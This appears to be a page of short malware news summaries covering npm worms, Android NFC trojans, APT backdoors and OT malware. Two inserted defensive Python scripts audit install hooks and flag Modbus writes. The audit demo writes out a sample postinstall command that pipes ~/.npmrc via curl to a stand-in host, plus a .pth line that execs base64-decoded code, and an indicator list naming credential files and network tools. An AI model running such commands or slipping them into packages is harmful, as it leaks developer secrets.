ciso brief

All news with #malware tag

810 articles · page 5 of 41

Fake CAPTCHA IRSF Scam and Keitaro Abuse Findings Report

🔍 Cybersecurity researchers from Infoblox disclosed an international revenue‑share fraud campaign that uses multi‑step fake CAPTCHA pages to trick users into sending premium SMS messages. The scheme leverages traffic distribution systems and JavaScript back‑button hijacking to force multiple prefilled SMS sends to dozens of international numbers, with charges often appearing weeks later. Operators also repurpose Keitaro TDS instances and compromised licenses to scale cloaking, tracking, and delivery of scams and malware.

Researchers Uncover pre-Stuxnet Lua Sabotage Tool fast16

🔎 SentinelOne researchers have disclosed fast16, a Lua-based cyber‑sabotage framework compiled in 2005 that predates Stuxnet. The implant embeds a Lua 5.0 VM and encrypted bytecode inside a carrier binary svcmgmt.exe and pairs with a kernel driver that patches executables to corrupt high‑precision calculations. fast16 targets legacy Windows 2000/XP environments and engineering simulation tools, and its discovery revises the timeline of state-backed cyber sabotage.

Shai-Hulud Worm Elevates npm Supply-Chain Risk Globally

🔒 Unit 42 describes a fundamental shift in the npm threat landscape following the September 2025 Shai‑Hulud worm and subsequent 2026 incidents. Adversaries now harvest npm and GitHub tokens to persist inside CI/CD pipelines, deploy dormant multi‑stage payloads, and automatically republish backdoored packages. The report attributes a broad, coordinated campaign to TeamPCP, documents propagation via Docker Hub, GitHub Actions and VS Code extensions, and recommends mitigations such as credential rotation, egress filtering, and dependency pinning.

Firestarter Backdoor Survives Cisco Firewall Patches

🔥 A custom backdoor named Firestarter has been observed persisting on Cisco Firepower and Secure Firewall devices running ASA or FTD software, surviving reboots, firmware updates, and security patches. U.S. CISA and the U.K. NCSC link the activity to a threat actor tracked as UAT-4356, which exploited CVE-2025-20333 and CVE-2025-20362. Cisco recommends reimaging and upgrading affected devices; administrators can check compromise with show kernel process | include lina_cs, and CISA published YARA rules and mitigation guidance.

Npm Supply-Chain Malware Uses Worm-Like Propagation

🐛 Researchers from Socket have identified malicious npm packages that execute during installation to harvest credentials and developer artifacts, then attempt worm-like propagation across ecosystems. The payload targets cloud and CI/CD tokens, SSH keys, .npmrc files, browser profiles and crypto wallets, exfiltrating data via HTTPS webhooks and ICP endpoints. It attempts to republish compromised packages using stolen npm tokens and can also generate PyPI payloads via .pth injection. The campaign leverages blockchain-hosted canisters for C2 and remains under active investigation.

UNC6692 Uses Microsoft Teams to Deploy SNOW Malware

🔒 Mandiant attributes to a newly documented cluster, UNC6692, social-engineering campaigns conducted over Microsoft Teams that coerce victims into installing malicious software and browser extensions. The actor leverages large-scale email-bombing to create urgency, then impersonates IT helpdesk staff to deliver an AutoHotkey-based installer hosted on attacker-controlled AWS S3. That installer loads the SNOW malware family, including SNOWBELT, SNOWGLAZE, and SNOWBASIN, enabling credential theft, tunneling, lateral movement, and data exfiltration.

Tax Season Phishing Targets Individuals and Crypto Users

🛡️ Scammers are creating convincing fake tax authority websites worldwide to harvest credentials, steal personal data, and distribute malware embedded in downloaded “documents.” These portals also run fraudulent paid services that collect taxpayer identifiers and financial details for later abuse. Cryptocurrency holders are specifically targeted with fake verification flows that request seed phrases or wallet connections, leading to immediate theft. Kaspersky cautions against using cloud-hosted AI for tax preparation and recommends sticking to verified official channels, encrypting sensitive files, and employing reputable security tools.

GopherWhisper APT Abuses Outlook, Slack, Discord in Attacks

🔐 A previously undocumented state-linked threat cluster dubbed GopherWhisper has been observed using a Go-based toolkit and legitimate services such as Microsoft 365 Outlook (via the Microsoft Graph API), Slack, and Discord to perform command-and-control and payload delivery. ESET identified the campaign targeting a Mongolian government entity and uncovered multiple backdoors — including LaxGopher, RatGopher, and BoxOfFriends — plus an exfiltration utility that uploads stolen archives to file.io. Analysts recovered thousands of Slack and Discord messages from attacker accounts, and telemetry including UTC+8 activity helped link the group to China.

GopherWhisper: China-aligned APT uses Go-based malware

🐿️ ESET researchers identified a previously undocumented China‑aligned APT group they named GopherWhisper, which targeted a Mongolian governmental entity and employed a broad toolkit of custom, mostly Go‑based malware. The group used injectors, loaders and multiple backdoors (notably LaxGopher, RatGopher and BoxOfFriends) and abused legitimate services—Slack, Discord, Microsoft 365 Outlook and file.io—for C&C and exfiltration. Recovery of attacker-operated Slack and Discord channels and Outlook draft messages provided extensive visibility into operator activity, development references and an operational cadence consistent with UTC+8.

Malicious KICS Docker Images and VS Code Extensions

⚠️ Cybersecurity researchers warn that unknown actors pushed malicious images to the official checkmarx/kics Docker Hub repository, overwriting tags and introducing a non-official release. Socket's analysis shows the bundled KICS binary was modified to collect, encrypt, and exfiltrate uncensored scan reports to an external endpoint, posing a high risk for IaC scans that may include credentials. Related Checkmarx Microsoft Visual Studio Code extensions (versions 1.17.0 and 1.19.0) were also found to contain code that downloads and runs a remote addon via the Bun runtime using a hardcoded GitHub URL without integrity checks. Organizations that used the affected images or extensions should assume exposed secrets are compromised and treat the event as a broader supply chain compromise.

Supply-Chain Worm Hijacks npm Packages to Steal Tokens

🔐 Researchers warn of a self-propagating supply-chain worm that infected multiple npm packages to harvest developer credentials and reuse stolen npm tokens to publish poisoned releases. Tracked as CanisterSprawl by Socket and StepSecurity, the campaign uses malicious postinstall hooks and exfiltrates data to both an HTTPS webhook and an ICP canister. The malware also includes PyPI propagation via a .pth payload that runs on interpreter start; JFrog reported compromised xinference Python packages with a Base64 second-stage collector. Recommended mitigations include restricting token scope, rotating and revoking exposed tokens, avoiding unsafe CI triggers like pull_request_target, and monitoring package publishes and postinstall behavior.

New npm supply-chain worm steals auth tokens, spreads

🚨 Researchers have uncovered a self-propagating npm supply-chain attack that steals developer credentials and attempts to republish infected packages from compromised accounts. Socket and StepSecurity observed malicious versions in at least 16 Namastex Labs packages, including AI tooling and database modules. The payload harvests tokens, API keys, SSH keys, cloud and CI/CD credentials, browser-stored wallets, and attempts to use npm and PyPI publish tokens to inject itself into packages and spread.

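The three npm worm write-ups above (the Socket findings, CanisterSprawl, and the Namastex Labs compromise) all turn on the same two execution hooks: npm lifecycle scripts that run at install time, and Python .pth files whose lines beginning with "import" are executed by site.py at interpreter start. The audit script below is an added example, not code from Socket, StepSecurity or JFrog. The package names, the indicator regex, the example.invalid URL and the sample package.json and .pth files are constructed for the demo and are not indicators from the reports; nothing in the sample tree is executed.

```python
"""Audit a tree for install-time execution hooks: npm lifecycle scripts
(preinstall/install/postinstall/prepare) and Python .pth files whose lines
begin with "import", which site.py executes at interpreter start.

Added example; the indicator list and sample files are constructed."""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Illustrative indicators only (assumption): credential files and exfil
# primitives the write-ups mention, plus the public Internet Computer
# boundary-node domains. Tune to your environment; expect false positives.
SUSPICIOUS = re.compile(
    r"\.npmrc|\.ssh|id_rsa|NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET|"
    r"curl|wget|webhook|ic0\.app|icp0\.io|base64|eval\(|child_process",
    re.IGNORECASE,
)


def audit_package_json(path):
    """Return (hook, command, suspicious) for each lifecycle script."""
    with open(path, encoding="utf-8") as fh:
        scripts = json.load(fh).get("scripts", {})
    return [(hook, cmd, bool(SUSPICIOUS.search(cmd)))
            for hook, cmd in scripts.items() if hook in LIFECYCLE_HOOKS]


def audit_pth(path):
    """Return the lines of a .pth file that site.py would exec()."""
    with open(path, encoding="utf-8") as fh:
        return [ln.strip() for ln in fh
                if ln.startswith(("import ", "import\t"))]


def audit_tree(root):
    """Walk root; collect suspicious lifecycle hooks and executable .pth lines."""
    report = {"lifecycle": [], "pth": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name == "package.json":
                for hook, cmd, bad in audit_package_json(full):
                    if bad:
                        report["lifecycle"].append((full, hook, cmd))
            elif name.endswith(".pth"):
                lines = audit_pth(full)
                if lines:
                    report["pth"].append((full, lines))
    return report


def build_demo_tree():
    """Constructed sample tree: a benign package, a worm-like package, a
    legitimate path-only .pth and an injected .pth. Nothing here is run."""
    root = tempfile.mkdtemp(prefix="sc-audit-")
    benign = os.path.join(root, "node_modules", "left-tool")
    worm = os.path.join(root, "node_modules", "ai-helper")
    site = os.path.join(root, "site-packages")
    for d in (benign, worm, site):
        os.makedirs(d)
    with open(os.path.join(benign, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "left-tool", "scripts": {"test": "node test.js"}}, fh)
    with open(os.path.join(worm, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "ai-helper", "scripts": {
            "postinstall": "node -e \"require('child_process').execSync("
                           "'cat ~/.npmrc | curl -s -d @- https://example.invalid/hook')\""}}, fh)
    with open(os.path.join(site, "easy-install.pth"), "w", encoding="utf-8") as fh:
        fh.write("./some_pkg-1.0-py3.egg\n")  # plain path entry: harmless
    with open(os.path.join(site, "xinf_boot.pth"), "w", encoding="utf-8") as fh:
        fh.write("import os,base64;exec(base64.b64decode('cHJpbnQoJ3N0YWdlMicp'))\n")
    return root


def demo():
    """Build the sample tree and return the audit report."""
    return audit_tree(build_demo_tree())


if __name__ == "__main__":
    report = demo()
    for path, hook, cmd in report["lifecycle"]:
        print("LIFECYCLE", path, hook, cmd)
    for path, lines in report["pth"]:
        print("PTH", path, lines)
```

Point audit_tree() at a real checkout or virtualenv instead of the demo tree. The lifecycle check is a triage aid, not a substitute for `npm config set ignore-scripts true` in CI, which stops lifecycle scripts from running at all; the .pth check matters because pip has no install hook, so a .pth file is the natural place for a PyPI-side worm to gain execution without touching the package's own modules.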
Trojanized NFC Relay App Used to Steal Card Data in Brazil

💳 Cybercriminals have trojanized an Android NFC-relay application to capture contactless payment data and PINs, enabling cloning of cards and remote ATM cash-outs. ESET researchers report a new NGate malware variant was injected into the HandyPay app and distributed via a fake lottery site and a spoofed Google Play page targeting Android users in Brazil since November 2025. Traces in the injected code, including emoji markers in debug logs, led researchers to suspect use of generative AI, and ESET has published indicators and a MITRE ATT&CK mapping to aid detection.

New Linux GoGra Backdoor Uses Microsoft Graph API for Comms

🔐 Symantec researchers describe a new Linux variant of the GoGra backdoor that abuses Microsoft Graph API and Outlook mailboxes for stealthy command-and-control. The malware uses hardcoded Azure AD credentials to obtain OAuth2 tokens and polls a mailbox folder named "Zomato Pizza" for base64-encoded, AES-CBC-encrypted commands. A Go-based dropper hides an i386 ELF payload as a PDF and establishes persistence via systemd and an XDG autostart entry mimicking the Conky monitor. Processed commands are encrypted and returned by reply email with the subject "Output," and the original command email is removed to limit forensic visibility.

Mustang Panda Deploys New LOTUSLITE Variant Targeting India

🛡️ Acronis researchers have identified a new variant of LOTUSLITE, attributed with medium confidence to the Chinese-linked Mustang Panda, being distributed via a banking-themed lure focused on India. The backdoor uses a dynamic DNS HTTPS C2 and supports remote shell access, file operations, and session management, indicating espionage-focused intent rather than financial theft. The campaign begins with a Compiled HTML (CHM) file that embeds a legitimate executable with a rogue DLL and triggers JavaScript fetched from cosmosmusic[.]com to perform DLL side-loading. The implanted DLL, dnx.onecore.dll, communicates with editor.gleeze[.]com, and similar artifacts were found targeting South Korean and U.S. policy and diplomatic communities.

NGate Android Campaign Trojans HandyPay to Steal NFC

🔒 ESET researchers uncovered an NGate Android campaign that trojanized the HandyPay NFC relay app to steal contactless card data and capture PINs for fraudulent ATM withdrawals. The poisoned app, spread via fake Rio de Prêmios sites and a deceptive Play Store listing, asks to be set as the default payment app and prompts users to enter their card PIN before tapping their card. Artifacts including emoji-laden debug messages suggest parts of the injected code may have been generated or modified with a large language model.

NGate Android Malware Hides in Trojans of HandyPay App

🔒 A new NGate variant is delivered inside a trojanized version of HandyPay, a legitimate NFC payments app, to steal payment card data from Android devices. Researchers at ESET say the campaign has been active since November 2025 and primarily targets users in Brazil, using fake Google Play pages and a malicious APK distribution chain. The trojan asks victims to set it as the default NFC payment app, collects card PINs and card taps, and exfiltrates the data via a hardcoded email address.

New NGate Variant Trojans HandyPay to Steal NFC Data

🔒 ESET researchers discovered a new NGate malware variant that trojanized the legitimate HandyPay Android NFC-relay app, with injected code displaying artifacts consistent with GenAI-assisted development. The patched app silently forwards NFC payment card data and captures payment card PINs, exfiltrating them to attacker-controlled C&C infrastructure to enable contactless ATM cash-outs and unauthorized payments. Distribution targeted Android users in Brazil since November 2025 via a fake Rio de Prêmios lottery site and a counterfeit Google Play page; both samples were served from the same domain, indicating a single operator. ESET notified Google and the HandyPay developer; known samples are detected by Google Play Protect and ESET.

Chinese App Store Infiltrated by Crypto Wallet Scams

⚠️ A cluster of 26 malicious apps on Apple's China App Store impersonated popular crypto wallets such as MetaMask, Coinbase, Trust Wallet, and OneKey to harvest recovery seed phrases and drain funds. The apps used typosquatting and fake branding, and were disguised as games or calculators to bypass local restrictions. They redirected victims to phishing pages that pushed trojanized wallets via abused iOS provisioning profiles; those trojans intercept mnemonics, encrypt them, and exfiltrate them. Kaspersky links the campaign, dubbed FakeWallet, to the ongoing SparkKitty operation, and Apple has removed the apps following disclosure.

ZionSiphon OT Malware Targets Water Treatment Systems

🔎 Darktrace researchers have analyzed a newly identified malware called ZionSiphon that combines typical endpoint compromise techniques with functions tailored to industrial control systems, specifically targeting water treatment and desalination infrastructure. The sample includes privilege escalation, persistence, and USB-based propagation alongside environment and software checks for reverse osmosis and chlorine control. While it can scan OT protocols such as Modbus and attempt register modifications, implementation gaps and a country-validation flaw suggest the strain is an early-stage tool that may fail to activate in many environments.
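
The ZionSiphon summary above says the sample can scan Modbus and attempt register modifications. The detector below is an added example, not Darktrace's code and not derived from the sample: it parses Modbus/TCP request frames (the 7-byte MBAP header followed by the PDU) and raises an alert for any write function code sent by a host outside a writer allowlist, or by an allowed host when the write touches a critical holding-register range. The IP addresses, the register range 100-109 (standing in for dosing setpoints), and all frames are constructed for the demo; in a real deployment the allowlist and register map come from the plant's engineering documentation.

```python
"""Flag Modbus/TCP write requests: parse the MBAP header and PDU, then alert
on write function codes from hosts that are not allowed to write or that
touch a critical holding-register range.

Added example; the allowlist, register range and frames are constructed."""
import struct

WRITE_FUNCTIONS = {
    5: "Write Single Coil",
    6: "Write Single Register",
    15: "Write Multiple Coils",
    16: "Write Multiple Registers",
    22: "Mask Write Register",
    23: "Read/Write Multiple Registers",
}

# Assumptions for the demo: one engineering workstation may write, and
# holding registers 100-109 hold (hypothetical) dosing setpoints.
ALLOWED_WRITERS = {"10.10.1.5"}
CRITICAL_HOLDING = range(100, 110)


def parse_modbus_tcp(frame):
    """Parse one Modbus/TCP request frame into a dict; raise ValueError if malformed."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header and function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus" % proto)
    if length != len(frame) - 6:  # length counts unit id + PDU
        raise ValueError("MBAP length %d does not match frame" % length)
    func, pdu = frame[7], frame[8:]
    msg = {"tid": tid, "unit": unit, "func": func, "address": None, "count": None}
    if func in (1, 2, 3, 4) and len(pdu) >= 4:       # reads: address, quantity
        msg["address"], msg["count"] = struct.unpack(">HH", pdu[:4])
    elif func in (5, 6) and len(pdu) >= 4:           # single write: address, value
        msg["address"], msg["value"] = struct.unpack(">HH", pdu[:4])
        msg["count"] = 1
    elif func in (15, 16) and len(pdu) >= 5:         # multi write: address, qty, byte count
        msg["address"], msg["count"], nbytes = struct.unpack(">HHB", pdu[:5])
        msg["payload"] = pdu[5:5 + nbytes]
    return msg


def detect(events):
    """events: iterable of (source_ip, frame). Returns a list of alert tuples."""
    alerts = []
    for src, frame in events:
        try:
            m = parse_modbus_tcp(frame)
        except ValueError as exc:
            alerts.append((src, "malformed", str(exc), None))
            continue
        if m["func"] not in WRITE_FUNCTIONS:
            continue
        name = WRITE_FUNCTIONS[m["func"]]
        if src not in ALLOWED_WRITERS:
            alerts.append((src, "unauthorized write", name, m["address"]))
        elif m["func"] in (6, 16) and m["address"] is not None:
            touched = range(m["address"], m["address"] + m["count"])
            if any(a in CRITICAL_HOLDING for a in touched):
                alerts.append((src, "critical register write", name, m["address"]))
    return alerts


def build_frame(tid, unit, func, body):
    """Build a Modbus/TCP request frame (used only to construct demo traffic)."""
    pdu = bytes([func]) + body
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def demo():
    """Constructed traffic: a read, an allowed host changing a critical
    setpoint, an unknown host writing registers, and a truncated frame."""
    events = [
        ("10.10.1.5", build_frame(1, 1, 3, struct.pack(">HH", 0, 10))),
        ("10.10.1.5", build_frame(2, 1, 6, struct.pack(">HH", 105, 0))),
        ("10.10.7.42", build_frame(3, 1, 16,
                                   struct.pack(">HHB", 0, 2, 4) + b"\x00\x01\x00\x02")),
        ("10.10.7.42", b"\x00\x04\x00\x00"),
    ]
    return detect(events)


if __name__ == "__main__":
    for alert in demo():
        print(*alert)
```

Feed detect() with (source, payload) pairs pulled from a TCP/502 capture or a span port; the "critical register write" alert from an allowed host is a review item rather than an incident, since operators do change setpoints, but it gives the context an OT responder needs when a sample like the one described starts probing register ranges.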